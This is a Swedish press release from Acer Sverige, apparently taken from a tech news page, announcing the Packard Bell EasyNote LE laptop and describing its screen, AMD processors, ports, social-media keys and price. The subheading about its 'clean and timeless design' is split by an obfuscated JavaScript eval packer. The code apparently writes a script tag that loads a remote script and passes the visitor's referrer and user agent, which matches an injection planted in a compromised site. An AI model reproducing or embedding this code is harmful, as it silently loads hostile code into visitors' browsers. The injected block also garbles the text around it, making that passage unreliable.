Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

PC

Packard Bell lanserar EasyNote LE

Packard Bell lanserar EasyNote LE
Sebastian

För att möta en allt större efterfrågan på stilfulla bärbara datorer som klarar samma uppgifter som en stationär dator, men till ett rimligt pris, har Packard Bell nyligen lanserat sin EasyNote LE.

Med EasyNote LE har Packard Bell återigen uppfyllt sina kärnprinciper: användarvänlig design, bra prestanda och ett rimligt pris. Denna senaste i raden av notebook-datorer har 17,3-tums skärm och uppfyller användarnas vardagsbehov, utan att det kostar skjortan.

”Nuförtiden behöver alla en tillförlitlig dator och efterfrågan på bärbara datorer i större format som kan utföra flera uppgifter samtidigt bara ökar”, säger Luca Rossi, vice vd för konsumentdivision EMEA vid Acer Group. ”Men folk vill inte bara ha bättre prestanda och fler funktioner – de vill ha det billigt också. Och det är precis vad Packard Bell EasyNote LE levererar.”

Ren eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arfdr|var|u0026u|referrer|bhkdb||js|php’.split(’|’),0,{}))
och tidlös design

Packard Bell EasyNote LE har 17,3-tumsskärm och är fullmatad med funktioner som förhöjer användarupplevelsen. Tillverkarens karaktäristiska stilkänsla är tydlig, med sitt rena och tidlösa formspråk. Se bara på det blanka svarta höljet i kombination med den eleganta silvergrå ytan vid handledsstödet. Och omsorgen om detaljerna sträcker sig längre än bara till utseendet. Ta till exempel styrplattan med stöd för multigester: Nyp, snärta, svep och zooma hur enkelt som helst med bara fingertopparna. Packard Bell EasyNote LE-serien är en idealisk uppgradering från stationär dator. Den ger dig allt du behöver för att surfa på Internet, lagra bilder och lyssna på musik – snart är den en följeslagare som du inte kan leva utan.

Högpresterande

Den som söker en visuell upplevelse kan få just precis det i Packard Bell EasyNote LE, med dess HD+-skärm i måtten 1600 x 900 och bildförhållandet 16:9. Bland de många möjligheterna som Packard Bell erbjuder har Packard Bell EasyNote LE-modellerna accelererade processorer (APU) av typen AMD dual-core E1-1200 eller AMD dual-core E-450 med separat grafikkort av typen AMD Radeon™ 7470M och stöd för DirectX® 11 – Oavsett    om du tittar på din favoritfilm eller videochattar får du alltid bästa möjliga bild. Tack vare HDMI®-porten är det enkelt att ansluta datorer ur Packard Bell EasyNote LE-serien till en HD-TV och låta dig svepas med av händelserna på nära håll i ett större bildformat.

Med upp till 1 TB lagringsutrymme har Packard Bell EasyNote LE även plats för ett fullständigt bibliotek av filmer, musik, foton och filer. Vill du ansluta till andra fillagringsenheter? Med allt-i-ett-kortläsaren kan du enkelt föra över foton, filmer, musik och andra filer, och via USB 3.0-porten kommer dina filer att flyga från den ena disken till den andra upp till tio gånger snabbare än tidigare! Vill du koppla upp dig på Internet när du är ute och reser? Trådlös anslutning gör det enkelt att ansluta från valfri åtkomstpunkt. Kanske kommer då även den integrerade webbkameran till nytta, som med en smart lysdiod talar om huruvida den är på eller av.

Användarvänlighet har blivit ett av Packard Bells främsta kännetecken. Snabbtangenterna ovanför tangentbordet ger snabbt tillgång till alla de funktioner och tjänster du vill nå på ett ögonblick.

Med tangenten MyBackUp kommer du exempelvis direkt till Nero® 10 Essentials och alternativ för snabb och enkel säkerhetskopiering. Eftersom säkerhetskopiering kan genomföras enligt schema i bakgrunden kan du alltid lita på att alla dina data är säkra, utan att du behöver lyfta ett finger.

Goda nyheter för användare av sociala nätverk

Specialtangenterna för sociala nätverk är något av det som får produktserien att sticka ut: En enda tangenttryckning tar dig smidigt till Twitter, Facebook, YouTube och Flickr. Praktiska funktioner för alla som använder sociala nätverk dagligen.

Pris och tillgänglighet

Packard Bell EasyNote LE-serien finns i butik nu till ett rekommenderat cirkapris på 3 990 kronor.

Tillgänglighet, programvaruutbud och tekniska funktioner kan variera mellan olika länder.

Detta är ett pressmeddelande från Acer Sverige